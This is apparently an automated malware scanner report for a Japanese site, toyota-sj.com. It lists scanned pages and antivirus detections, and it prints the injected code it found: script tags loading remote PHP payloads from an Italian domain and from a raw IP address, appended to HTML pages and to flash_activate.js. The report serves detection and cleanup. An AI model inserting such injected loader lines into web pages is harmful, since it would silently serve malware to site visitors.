New scan:

Malware Scanner report for toyota-sj.com

Malicious/Suspicious/Total urls checked
2/9/15
11 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "toyota-sj.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=toyota-sj.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://toyota-sj.com/
200 OK
Content-Length: 16240
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://www.bauunternehmung.it/Bv7rbgXR.php?id=46037102"></script>

http://toyota-sj.com/flash_activate.js
200 OK
Content-Length: 2654
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

...[1442 bytes skipped]...
}
}

strObj = '>';
strEmb = 'type="application/x-shockwave-flash" ';
strEmb = 'pluginspage="http://www.macromedia.com/go/getflashplayer" />';

document.write(strObj);
document.write(strPrm);
document.write(strEmb);
document.write('</object>');
}
document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://184.168.41.108/justhispanic/sYi63pYS.php" type="text/javascript"></script>')

Antivirus reports:

Avast
JS:GwLoad-A [Trj]
TrendMicro-HouseCall
TROJ_GEN.F47V1129
DrWeb
JS.IFrame.514
Microsoft
Trojan:JS/Redirector.MT
VIPRE
Malware.JS.Generic (JS)
AVG
JS/Redir

http://toyota-sj.com/Scripts/swfobject_modified.js
200 OK
Content-Length: 22031
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://www.bauunternehmung.it/Bv7rbgXR.php?id=46037122"></script>');

http://tenki.wet.co.jp/amedasicon/disp.js
200 OK
Content-Length: 8208
Content-Type: application/x-javascript
clean
http://toyota-sj.com/bukken.html
200 OK
Content-Length: 35192
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://www.bauunternehmung.it/Bv7rbgXR.php?id=46037098"></script>

http://toyota-sj.com/../Users/kuse/AppData/Roaming/IBM/Homepage Builder Version 12/tmp/cache/www.toyota-sj.com/index.html
400 Bad Request
Content-Length: 226
Content-Type: text/html
clean
http://toyota-sj.com/test404page.js
404 Not Found
Content-Length: 212
Content-Type: text/html
clean
http://toyota-sj.com/satei.html
200 OK
Content-Length: 9512
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://www.bauunternehmung.it/Bv7rbgXR.php?id=46037115"></script>

http://toyota-sj.com/./index.html
200 OK
Content-Length: 16240
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://www.bauunternehmung.it/Bv7rbgXR.php?id=46037102"></script>

http://toyota-sj.com/./flash_activate.js
200 OK
Content-Length: 2654
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

...[1442 bytes skipped]...
}
}

strObj = '>';
strEmb = 'type="application/x-shockwave-flash" ';
strEmb = 'pluginspage="http://www.macromedia.com/go/getflashplayer" />';

document.write(strObj);
document.write(strPrm);
document.write(strEmb);
document.write('</object>');
}
document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://184.168.41.108/justhispanic/sYi63pYS.php" type="text/javascript"></script>')

Antivirus reports:

Avast
JS:GwLoad-A [Trj]
TrendMicro-HouseCall
TROJ_GEN.F47V1129
DrWeb
JS.IFrame.514
Microsoft
Trojan:JS/Redirector.MT
VIPRE
Malware.JS.Generic (JS)
AVG
JS/Redir

http://toyota-sj.com/./Scripts/swfobject_modified.js
200 OK
Content-Length: 22031
Content-Type: application/javascript
suspicious
Suspicious code found

document.write('<script type="text/javascript" src="http://www.bauunternehmung.it/Bv7rbgXR.php?id=46037122"></script>');

http://toyota-sj.com/./bukken.html
200 OK
Content-Length: 35192
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://www.bauunternehmung.it/Bv7rbgXR.php?id=46037098"></script>

http://toyota-sj.com/./../Users/kuse/AppData/Roaming/IBM/Homepage Builder Version 12/tmp/cache/www.toyota-sj.com/index.html
400 Bad Request
Content-Length: 226
Content-Type: text/html
clean
http://toyota-sj.com/./satei.html
200 OK
Content-Length: 9512
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://www.bauunternehmung.it/Bv7rbgXR.php?id=46037115"></script>

http://toyota-sj.com/././index.html
200 OK
Content-Length: 16240
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://www.bauunternehmung.it/Bv7rbgXR.php?id=46037102"></script>


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: toyota-sj.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 05 Oct 2014 17:18:31 GMT
Accept-Ranges: bytes
ETag: "229b1a0-3f70-4f4bec80b7400"
Server: Apache/2.2.25
Content-Length: 16240
Content-Type: text/html
Last-Modified: Sun, 16 Mar 2014 20:02:24 GMT

...16240 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: toyota-sj.com
Referer: http://www.google.com/search?q=toyota-sj.com

Result:
The result is similar to the first query. There are no suspicious redirects found.